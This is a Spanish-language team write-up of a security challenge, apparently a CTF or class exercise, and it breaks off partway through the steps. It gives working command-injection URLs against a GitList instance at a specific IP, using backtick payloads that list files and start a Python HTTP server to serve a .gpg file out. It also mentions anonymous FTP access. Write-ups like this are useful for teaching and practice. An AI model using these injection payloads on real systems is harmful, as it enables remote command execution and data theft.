El reto final: fue un poco difícil ya que luego de crear el grupo solo participamos tres personas activamente en el reto, Cadtux Jack Diego Roibás, Juan José Díaz, Remigio Salvador Sánchez, al final solo logramos sacar unos cuantos archivos nivel uno y nivel 2por ftp y por un vulnerabilidad de gitlist. A continuación les mostrare un video y la descripción de cómo lo logramos.
Antes de iniciar realizamos varios scann de seguridad utilizando Nessus, Vega, entre otros.
Con este reporte realizamos pruebas a las vulnerabilidades y parchamos tomando en cuenta los resultados del scan de nessus.
Para descargar documento #1
Simple ftp anonimo
ftp://45.55.95.29/
Par descargar el documento #2
se utilizó una vulnerabilidad encontrada en gitlist la cual resolvimos actualizando el sistema.
Proceso de descarga:
Abrir servidor:
ahora vamos a gitlist/gitlist/tree/master. En esta ruta vamos a ejecutar comandos de consola que con el usuario wwwdata, para explorar la vulnerabilidad escribimos luego de la ruta “”` comando a ejecutar y cerramos` esto devolverá un resultado como si fuese un error pero no lo es, lo que está haciendo es que nos está mostrando el resultado de la ejecución del comando.
http://45.55.95.29/gitlist/gitlist/tree/master/””` ls /usr/share/doc/base-files/*.gpg`
copiamos el archivo con extensión gpg a una ruta donde podemos levantar un servidor python:
validando copia del archivo:
http://45.55.95.29/gitlist/gitlist/tree/master/""`ls /var/www/html/gitlist/cache/`
levantando servidro python:
http://45.55.95.29/gitlist/gitlist/tree/master/""`cd /var/www/html/gitlist/cache && python -m SimpleHTTPServer 8000`
el server se quedara cargando así que debemos cambiar a la siguiente ruta